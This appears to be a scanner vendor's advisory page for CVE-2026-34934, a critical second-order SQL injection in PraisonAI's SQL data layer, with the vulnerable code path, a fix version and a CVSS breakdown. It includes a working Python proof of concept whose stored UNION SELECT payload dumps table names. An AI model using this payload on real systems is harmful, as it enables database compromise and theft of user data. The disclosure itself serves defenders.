Loading...
Skip to main content

CVE-2026-34934

CRITICAL

PraisonAI Has Second-Order SQL Injection in `get_all_user_threads`

Published April 1, 2026Updated June 29, 2026Source: osv

Summary

## Summary The `get_all_user_threads` function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via `update_thread`. When the application loads the thread list, the injected payload executes and grants full database access. --- ## Details **File Path:** `src/praisonai/praisonai/ui/sql_alchemy.py` **Flow:** - **Source (Line 539):** ```python await data_layer.update_thread(thread_id=payload, user_id=user) ``` - **Hop (Line 547):** ```python thread_ids = "('" + "','".join([t["thread_id"] for t in user_threads]) + "')" ``` - **Sink (Line 576):** ```sql WHERE s."threadId" IN {thread_ids} ``` --- ## Proof of Concept (PoC) ```python import asyncio from praisonai.ui.sql_alchemy import SQLAlchemyDataLayer async def run_poc(): data_layer = SQLAlchemyDataLayer(conninfo="sqlite+aiosqlite:///app.db") # Insert a valid thread await data_layer.update_thread( thread_id="valid_thread", user_id="attacker" ) # Inject malicious payload payload = "x') UNION SELECT name, null, null, 'valid_thread', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM sqlite_master--" await data_layer.update_thread( thread_id=payload, user_id="attacker" ) # Trigger vulnerable function result = await data_layer.get_all_user_threads(user_id="attacker") for thread in result: if getattr(thread, 'id', '') == 'valid_thread': for step in getattr(thread, 'steps', []): print(getattr(step, 'id', '')) asyncio.run(run_poc()) # Expected Output: # sqlite_master table names printed to console ``` --- ## Impact An attacker can achieve full database compromise, including: - Exfiltration of sensitive data (user emails, session tokens, API keys) - Access to all conversation histories - Ability to modify or delete database contents

Remediation

Upgrade to the fixed version using your package manager.

pip
Update praisonai to 4.5.90 or later
pip install "praisonai>=4.5.90"

After upgrading, run your dependency scanner again to confirm the vulnerability is resolved.

Affected Packages (1)

PackageEcosystemAffectedFixed In
praisonai
pypi
0.0.1, 0.0.10, 0.0.11, 0.0.12 (+647 more)4.5.90

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 9.8 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Frequently Asked Questions

What is CVE-2026-34934?
PraisonAI Has Second-Order SQL Injection in `get_all_user_threads` This vulnerability has been assigned a severity rating of CRITICAL (CVSS score: 9.8/10).
How do I check if my project is affected by CVE-2026-34934?
CVE-2026-34934 affects praisonai. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2026-34934 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
9.8

Exploitation is straightforward and causes maximum impact. Patch immediately.

Also Known As

GHSA-9cq8-3v94-434g
PYSEC-2026-470

Related CVEs

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies